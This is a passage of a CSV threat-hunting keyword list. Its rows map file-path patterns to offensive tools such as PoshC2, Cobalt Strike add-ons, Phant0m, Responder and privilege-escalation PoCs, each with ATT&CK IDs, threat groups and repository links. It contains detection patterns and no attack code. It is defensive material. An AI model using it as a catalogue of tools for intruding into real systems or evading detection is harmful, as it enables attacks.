TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Phant0m.git*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*/phant0m-exe*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*/phishing.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/phishing/*.html*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/phishing/password_box*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/PhishingServer/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/pid:1337 */dll:*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer.git*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer/Program.cs*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/pitty_tiger.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/pivotnacci.git*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*/pivotnaccilib*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*/pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"*/pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/PKINITtools*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/Plazmaz/LNKUp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/PoC/PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*/POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/PoC-CVE-2023-21554*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,, +"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*/pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/PortBender/*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/POSeidon.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 